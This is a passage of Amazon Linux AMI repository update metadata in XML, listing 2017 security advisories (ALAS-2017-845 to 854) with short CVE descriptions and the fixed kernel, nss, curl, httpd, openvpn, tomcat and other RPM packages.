epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-157.170.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="157.170.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-157.170.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="157.170.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-157.170.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="157.170.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-157.170.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="157.170.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-157.170.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-845</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-845: critical priority package update for kernel</title><issued date="2017-06-19 08:58:00" /><updated date="2017-06-19 08:58:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000371:
The offset2lib patch as used by the Linux Kernel contains a vulnerability, if RLIMIT_STACK is set to RLIMIT_INFINITY and 1 Gigabyte of memory is allocated (the maximum under the 1/4 restriction) then the stack will be grown down to 0x80000000, and as the PIE binary is mapped above 0x80000000 the minimum distance between the end of the PIE binary's read-write segment and the start of the stack becomes small enough that the stack guard page can be jumped over by an attacker. This affects Linux Kernel version 4.11.5. This is a different issue than CVE-2017-1000370 and CVE-2017-1000365.
CVE-2017-1000371
CVE-2017-1000364:
CVE-2017-1000364
An issue was discovered in the size of the stack guard page on Linux, specifically a 4k stack guard page is not sufficiently large and can be jmp ed over, this affects Linux Kernel versions 4.11.5 and earlier (the stackguard page was introduced in 2010).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000364" title="" id="CVE-2017-1000364" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000371" title="" id="CVE-2017-1000371" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.9.27" release="14.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.27-14.33.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.27" release="14.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.27-14.33.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.27" release="14.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.27-14.33.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.27" release="14.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.27-14.33.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.27" release="14.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.27-14.33.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.27" release="14.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.27-14.33.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.27" release="14.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.27-14.33.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.27" release="14.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.27-14.33.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.27" release="14.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.27-14.33.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.27" release="14.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.27-14.33.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.27" release="14.33.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.27-14.33.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.9.27" release="14.33.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.27-14.33.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.27" release="14.33.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.27-14.33.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.27" release="14.33.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.27-14.33.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.27" release="14.33.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.27-14.33.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.27" release="14.33.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.27-14.33.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.27" release="14.33.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.27-14.33.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.27" release="14.33.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.27-14.33.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.27" release="14.33.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.27-14.33.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.27" release="14.33.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.27-14.33.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.27" release="14.33.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.27-14.33.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-846</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-846: medium priority package update for kernel</title><issued date="2017-06-22 19:10:00" /><updated date="2017-06-22 22:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-9242:
The __ip6_append_data function in net/ipv6/ip6_output.c in the Linux kernel through 4.11.3 is too late in checking whether an overwrite of an skb data structure may occur, which allows local users to cause a denial of service (system crash) via crafted system calls.
1456388:
CVE-2017-9242 kernel: Incorrect overwrite check in __ip6_append_data()
CVE-2017-9077:
The tcp_v6_syn_recv_sock function in net/ipv6/tcp_ipv6.c in the Linux kernel mishandles inheritance, which allows local users to cause a denial of service or possibly have unspecified other impact via crafted system calls, a related issue to CVE-2017-8890. An unprivileged local user could use this flaw to induce kernel memory corruption on the system, leading to a crash. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.
1452744:
CVE-2017-9077 kernel: net: tcp_v6_syn_recv_sock function mishandles inheritance
CVE-2017-9076:
The IPv6 DCCP implementation in the Linux kernel mishandles inheritance, which allows local users to cause a denial of service or possibly have unspecified other impact via crafted system calls, a related issue to CVE-2017-8890. An unprivileged local user could use this flaw to induce kernel memory corruption on the system, leading to a crash. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.
1452688:
CVE-2017-9076 kernel: net: IPv6 DCCP implementation mishandles inheritance
CVE-2017-9075:
The sctp_v6_create_accept_sk function in net/sctp/ipv6.c in the Linux kernel mishandles inheritance, which allows local users to cause a denial of service or possibly have unspecified other impact via crafted system calls, a related issue to CVE-2017-8890. An unprivileged local user could use this flaw to induce kernel memory corruption on the system, leading to a crash. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.
1452691:
CVE-2017-9075 kernel: net: sctp_v6_create_accept_sk function mishandles inheritance
CVE-2017-9074:
The IPv6 fragmentation implementation in the Linux kernel does not consider that the nexthdr field may be associated with an invalid option, which allows local users to cause a denial of service (out-of-bounds read and BUG) or possibly have unspecified other impact via crafted socket and send system calls. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.
1452679:
CVE-2017-9074 kernel: net: IPv6 fragmentation implementation of nexthdr field may be associated with an invalid option
CVE-2017-9059:
The NFSv4 implementation in the Linux kernel through 4.11.1 allows local users to cause a denial of service (resource consumption) by leveraging improper channel callback shutdown when unmounting an NFSv4 filesystem, aka a &quot;module reference and kernel daemon&quot; leak.
1451386:
CVE-2017-9059 kernel: Module reference leak due to improper shut down of callback channel on umount
CVE-2017-8890:
The inet_csk_clone_lock function in net/ipv4/inet_connection_sock.c in the Linux kernel allows attackers to cause a denial of service (double free) or possibly have unspecified other impact by leveraging use of the accept system call. An unprivileged local user could use this flaw to induce kernel memory corruption on the system, leading to a crash. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.
1450972:
CVE-2017-8890 kernel: Double free in the inet_csk_clone_lock function in net/ipv4/inet_connection_sock.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8890" title="" id="CVE-2017-8890" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9059" title="" id="CVE-2017-9059" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9074" title="" id="CVE-2017-9074" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9075" title="" id="CVE-2017-9075" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9076" title="" id="CVE-2017-9076" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9077" title="" id="CVE-2017-9077" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9242" title="" id="CVE-2017-9242" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-devel" version="4.9.32" release="15.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.32-15.41.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.32" release="15.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.32-15.41.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.32" release="15.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.32-15.41.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.32" release="15.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.32-15.41.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.32" release="15.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.32-15.41.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.32" release="15.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.32-15.41.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.32" release="15.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.32-15.41.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.32" release="15.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.32-15.41.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.32" release="15.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.32-15.41.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.32" release="15.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.32-15.41.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.32" release="15.41.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.32-15.41.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.32" release="15.41.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.32-15.41.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.32" release="15.41.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.32-15.41.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.32" release="15.41.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.32-15.41.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.32" release="15.41.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.32-15.41.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.32" release="15.41.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.32-15.41.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.32" release="15.41.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.32-15.41.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.32" release="15.41.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.32-15.41.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.9.32" release="15.41.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.32-15.41.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.32" release="15.41.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.32-15.41.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.32" release="15.41.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.32-15.41.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-847</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-847: medium priority package update for lynis</title><issued date="2017-06-22 19:19:00" /><updated date="2017-06-22 23:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-8108:
Unspecified tests in Lynis before 2.5.0 allow local users to write to arbitrary files or possibly gain privileges via a symlink attack on a temporary file.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8108" title="" id="CVE-2017-8108" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="lynis" version="2.5.0" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/lynis-2.5.0-1.6.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-848</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-848: important priority package update for nss</title><issued date="2017-06-22 19:20:00" /><updated date="2017-06-22 22:58:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7502:
A null pointer dereference flaw was found in the way NSS handled empty SSLv2 messages. An attacker could use this flaw to crash a server application compiled against the NSS library.
1446631:
CVE-2017-7502 nss: Null pointer dereference when handling empty SSLv2 messages
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7502" title="" id="CVE-2017-7502" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-debuginfo" version="3.28.4" release="1.2.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.28.4-1.2.79.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.28.4" release="1.2.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.28.4-1.2.79.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.28.4" release="1.2.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.28.4-1.2.79.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.28.4" release="1.2.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.28.4-1.2.79.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.28.4" release="1.2.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.28.4-1.2.79.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.28.4" release="1.2.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.28.4-1.2.79.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.28.4" release="1.2.79.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.28.4-1.2.79.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.28.4" release="1.2.79.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.28.4-1.2.79.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.28.4" release="1.2.79.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.28.4-1.2.79.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.28.4" release="1.2.79.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.28.4-1.2.79.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.28.4" release="1.2.79.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.28.4-1.2.79.amzn1.i686.rpm</filename></package><package name="nss" version="3.28.4" release="1.2.79.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.28.4-1.2.79.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-849</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-849: important priority package update for puppet3</title><issued date="2017-06-22 19:23:00" /><updated date="2017-06-22 22:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-2295:
1452651:
CVE-2017-2295 puppet: Unsafe YAML deserialization
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2295" title="" id="CVE-2017-2295" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="puppet3" version="3.7.4" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/puppet3-3.7.4-1.13.amzn1.noarch.rpm</filename></package><package name="puppet3-server" version="3.7.4" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/puppet3-server-3.7.4-1.13.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-850</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-850: low priority package update for curl</title><issued date="2017-06-22 19:24:00" /><updated date="2017-06-22 23:03:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7407:
The ourWriteOut function in tool_writeout.c in curl 7.53.1 might allow physically proximate attackers to obtain sensitive information from process memory in opportunistic circumstances by reading a workstation screen during use of a --write-out argument ending in a &#039;%&#039; character, which leads to a heap-based buffer over-read.
1439190:
CVE-2017-7407 curl: --write-out out of bounds read
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7407" title="" id="CVE-2017-7407" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcurl" version="7.51.0" release="6.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.51.0-6.74.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.51.0" release="6.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.51.0-6.74.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.51.0" release="6.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.51.0-6.74.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.51.0" release="6.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.51.0-6.74.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.51.0" release="6.74.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.51.0-6.74.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.51.0" release="6.74.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.51.0-6.74.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.51.0" release="6.74.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.51.0-6.74.amzn1.i686.rpm</filename></package><package name="curl" version="7.51.0" release="6.74.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.51.0-6.74.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-851</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-851: medium priority package update for httpd</title><issued date="2017-06-22 19:25:00" /><updated date="2017-06-22 22:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-8743:
It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning.
1406822:
CVE-2016-8743 httpd: Apache HTTP Request Parsing Whitespace Defects
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8743" title="" id="CVE-2016-8743" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd-devel" version="2.2.32" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.32-1.9.amzn1.x86_64.rpm</filename></package><package name="mod_ssl" version="2.2.32" release="1.9.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.32-1.9.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.32" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.32-1.9.amzn1.noarch.rpm</filename></package><package name="httpd-tools" version="2.2.32" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.32-1.9.amzn1.x86_64.rpm</filename></package><package name="httpd" version="2.2.32" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.32-1.9.amzn1.x86_64.rpm</filename></package><package name="httpd-debuginfo" version="2.2.32" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.32-1.9.amzn1.x86_64.rpm</filename></package><package name="httpd-devel" version="2.2.32" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.32-1.9.amzn1.i686.rpm</filename></package><package name="httpd-debuginfo" version="2.2.32" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-debuginfo-2.2.32-1.9.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.32" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-2.2.32-1.9.amzn1.i686.rpm</filename></package><package name="httpd-tools" version="2.2.32" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-tools-2.2.32-1.9.amzn1.i686.rpm</filename></package><package name="mod_ssl" version="2.2.32" release="1.9.amzn1" epoch="1" arch="i686"><filename>Packages/mod_ssl-2.2.32-1.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-852</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-852: important priority package update for openvpn</title><issued date="2017-06-27 17:47:00" /><updated date="2017-07-06 22:56:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7522:
OpenVPN versions before 2.4.3 and before 2.3.17 are vulnerable to denial-of-service by authenticated remote attacker via sending a certificate with an embedded NULL character.
1463642:
CVE-2017-7508 CVE-2017-7520 CVE-2017-7521 CVE-2017-7522 openvpn: Multiple security issues fixed in OpenVPN 2.4.3 and 2.3.17
CVE-2017-7521:
OpenVPN versions before 2.4.3 and before 2.3.17 are vulnerable to remote denial-of-service due to memory exhaustion caused by memory leaks and double-free issue in extract_x509_extension().
1463642:
CVE-2017-7508 CVE-2017-7520 CVE-2017-7521 CVE-2017-7522 openvpn: Multiple security issues fixed in OpenVPN 2.4.3 and 2.3.17
CVE-2017-7520:
OpenVPN versions before 2.4.3 and before 2.3.17 are vulnerable to denial-of-service and/or possibly sensitive memory leak triggered by man-in-the-middle attacker.
1463642:
CVE-2017-7508 CVE-2017-7520 CVE-2017-7521 CVE-2017-7522 openvpn: Multiple security issues fixed in OpenVPN 2.4.3 and 2.3.17
CVE-2017-7508:
OpenVPN versions before 2.4.3 and before 2.3.17 are vulnerable to remote denial-of-service when receiving malformed IPv6 packet.
1463642:
CVE-2017-7508 CVE-2017-7520 CVE-2017-7521 CVE-2017-7522 openvpn: Multiple security issues fixed in OpenVPN 2.4.3 and 2.3.17
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7508" title="" id="CVE-2017-7508" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7520" title="" id="CVE-2017-7520" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7521" title="" id="CVE-2017-7521" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7522" title="" id="CVE-2017-7522" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openvpn" version="2.4.3" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-2.4.3-1.19.amzn1.x86_64.rpm</filename></package><package name="openvpn-debuginfo" version="2.4.3" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-debuginfo-2.4.3-1.19.amzn1.x86_64.rpm</filename></package><package name="openvpn-devel" version="2.4.3" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-devel-2.4.3-1.19.amzn1.x86_64.rpm</filename></package><package name="openvpn-devel" version="2.4.3" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-devel-2.4.3-1.19.amzn1.i686.rpm</filename></package><package name="openvpn-debuginfo" version="2.4.3" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-debuginfo-2.4.3-1.19.amzn1.i686.rpm</filename></package><package name="openvpn" version="2.4.3" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-2.4.3-1.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-853</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-853: important priority package update for tomcat7</title><issued date="2017-07-06 17:24:00" /><updated date="2017-07-06 22:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-5664:
A vulnerability was discovered in the error page mechanism in Tomcat&#039;s DefaultServlet implementation. A crafted HTTP request could cause undesired side effects, possibly including the removal or replacement of the custom error page.
1459158:
CVE-2017-5664 tomcat: Security constrained bypass in error page mechanism
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5664" title="" id="CVE-2017-5664" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-webapps" version="7.0.78" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.78-1.27.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.78" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.78-1.27.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.78" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.78-1.27.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.78" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.78-1.27.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.78" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.78-1.27.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.78" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.78-1.27.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.78" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.78-1.27.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.78" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.78-1.27.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.78" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.78-1.27.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.78" release="1.27.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.78-1.27.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-854</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-854: important priority package update for tomcat8</title><issued date="2017-07-06 17:25:00" /><updated date="2017-07-06 22:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following 